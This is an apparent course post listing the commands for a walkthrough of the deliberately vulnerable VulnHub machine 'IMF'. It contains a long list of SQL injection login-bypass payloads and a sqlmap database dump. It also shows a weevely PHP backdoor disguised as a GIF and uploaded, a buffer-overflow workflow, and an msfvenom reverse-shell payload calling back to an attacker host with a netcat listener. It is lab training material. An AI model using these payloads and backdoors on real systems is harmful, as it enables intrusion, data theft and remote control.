Published on June 16th, 2019

IMF Walkthrough (VulnHub)


Description:

This video from my Udemy course "Hands-on Penetration Testing Labs 3.0" will show you how to enumerate and exploit the intentionally vulnerable VM named IMF.

Check below for relevant commands and URLs.

Commands:

netdiscover -i eth1

nmap -p- -A (IP)

view-source:http://192.168.56.109/contact.php

echo `echo "YWxsdGhlZmlsZXM=" | base64 --decode`
echo `echo "ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==" | base64 --decode`

SQL injection payloads:
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
' or 1=1 --
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --

sqlmap -r sqli1 --risk=3 --level=5 --dbs --dump --batch --threads=10

weevely generate jesse backdoorz.php

mv backdoorz.php backdoorz.gif

GIF89a34444

weevely http://192.168.56.109/imfadministrator/uploads/3e085014f2a4.gif jesse

find / -name agent 2>/dev/null

/usr/local/bin/agent





cd /usr/local/bin/

netstat -ant
nc 127.0.0.1 7788

cat /usr/local/bin/access_codes

knock 192.168.56.109 -v 7482 8279 9467

nmap -p7788 192.168.56.109

git clone https://github.com/avast/retdec.git

apt-get install build-essential cmake git perl python3 bison flex libfl-dev autoconf automake libtool pkg-config m4 zlib1g-dev upx doxygen graphviz

cd retdec
mkdir build && cd build
cmake .. -DCMAKE_INSTALL_PREFIX=~/retdec
make && make install

on the weevely shell - :file_download /usr/local/bin/agent ~/retdec/bin

./retdec-decompiler.py agent

cat agent* | less -Sr

echo $((0x2ddd984))

chmod +x agent

python -c 'print("A" * 200)'

locate pattern_create
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200

gdb agent
run
48093572

locate pattern_offset
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.56.101 LPORT=4448 -f python -b "\x00\x0a\x0d"
00 for NULL
0A for Line Feed \n
0D for Carriage Return \r

nc -nlvp 4448
python agentsploit.py 192.168.56.109 7788

echo `echo "YWxsdGhlZmlsZXM=" | base64 --decode`

URLs:

https://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf
https://zxing.org/w/decode.jspx
https://github.com/grongor/knock.git
https://github.com/jessekurrus/agentsploit/blob/master/agentsploit.py
https://www.vulnhub.com/entry/imf-1,162/
